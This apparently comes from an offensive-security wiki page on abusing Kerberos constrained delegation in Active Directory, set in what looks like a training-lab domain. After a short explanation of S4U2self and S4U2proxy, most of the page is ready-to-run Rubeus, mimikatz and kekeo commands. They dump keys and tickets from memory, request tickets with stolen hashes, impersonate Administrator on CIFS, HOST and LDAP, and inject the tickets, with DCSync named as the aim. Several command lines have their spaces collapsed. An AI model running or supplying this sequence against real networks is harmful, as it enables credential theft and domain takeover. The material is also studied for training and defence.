Using this a Domain admin can allow a computer to impersonate a user or computer against a service of a machine.
Service for User to self (S4U2self): If a service account has a userAccountControl value containing TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
Service for User to Proxy(S4U2proxy): A service account could obtain a TGS on behalf any user to the service set in msDS-AllowedToDelegateTo. To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
Note: If a user is marked as ‘Account is sensitive and cannot be delegated ’ in AD, you will not be able to impersonate them.
This means that if you compromise the hash of the service you can impersonate users and obtain access on their behalf to the service configured (possible privesc).
Moreover, you won't only have access to the service that the user is able to impersonate, but also to any service because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to CIFS service you can also have access to HOST service using /altservice flag in Rubeus.
Also, LDAP service access on DC, is what is needed to exploit a DCSync.
# The first step is to get a TGT of the service that can impersonate others## If you are SYSTEM in the server, you might take it from memory.\Rubeus.exetriage.\Rubeus.exedump/luid:0x3e4/service:krbtgt/nowrap# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one## Get AES/RC4 with mimikatzmimikatzsekurlsa::ekeys## Request with aestgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
# Request with RC4tgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d.\Rubeus.exeasktgt/user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f/outfile:TGT_websvc.kirbi
There are other ways to obtain a TGT ticket or the RC4 or AES256 without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse
Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.
Using Rubeus
#Obtain a TGS of the Administrator user to self.\Rubeus.exes4u/ticket:TGT_websvc.kirbi/impersonateuser:Administrator/outfile:TGS_administrator#Obtain service TGS impersonating Administrator (CIFS).\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST).\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2).\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
#Load ticket in memory.\Rubeus.exeptt/ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
kekeo + Mimikatz
#Obtain a TGT for the Constained allowed usertgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memoryInvoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'